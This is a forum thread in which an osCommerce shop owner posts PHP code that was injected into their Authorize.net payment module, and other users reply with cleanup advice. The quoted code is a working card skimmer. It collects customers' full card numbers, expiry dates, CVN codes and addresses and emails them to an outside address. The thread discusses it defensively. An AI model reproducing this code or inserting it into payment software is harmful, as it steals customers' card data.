Authorize.net files hacked + report e-mail out

[Sadtra]

Running osCommerce 2.2-MS2... Here is the code that is added to my authorize.php file (I upload and this hack keeps returning and only the report e-mail to address changes :

 

 

// build report

 

$report = 'Date: ' . date("D M j G:i:s Y");

 

$report .= "--" . 'Name: ' . $order->billing['firstname'] . ' ' . $order->billing['lastname'];

 

$report .= "--" . 'Number: ' . $this->cc_card_number;

 

$report .= "--" . 'Exp: ' . $this->cc_expiry_month . '/' . substr($this->cc_expiry_year, -2);

 

$report .= "--" . 'CVN: ' . $this->cc_card_verify;

 

$report .= "--" . 'Email: ' . $mail;

 

$report .= "--" . 'Address:' . $order->billing['street_address'] . ' City: ' . $order->billing['city'] . ' State: ' . $order->billing['state'] . ' Code: ' . $order->billing['postcode'];

 

$report .= "--" . 'Phone: ' . $order->customer['telephone'] . ' Country: ' . $order->billing['country']['title'];

 

 

 

// mail report

 

tep_mail('BMT', '[email protected]', '[ REPORT ] CCV notary', stripslashes($report),'', $mail);

 

if (MODULE_PAYMENT_AUTHORIZENET_TESTMODE == 'Test') $process_button_string .= tep_draw_hidden_field('x_Test_Request', 'TRUE');

 

 

 

$process_button_string .= tep_draw_hidden_field(tep_session_name(), tep_session_id());

[germ]

Change all your passwords (your control panel, osCommerce admin, any .htaccess passwords).

 

After you upload the fixed version of the hacked file, set the permissions to 444 (read-only for everyone).

 

Report the hack to your host as the server may be hacked, and nothing you do will help if that's the case.

[♥Vger]

I've seen this happening quite a bit recently, and not just with A Net. It IS down to either lax site security or servers being compromised. My best guess is the server control panel - and I'd also bet it's another cPanel exploit.

 

Vger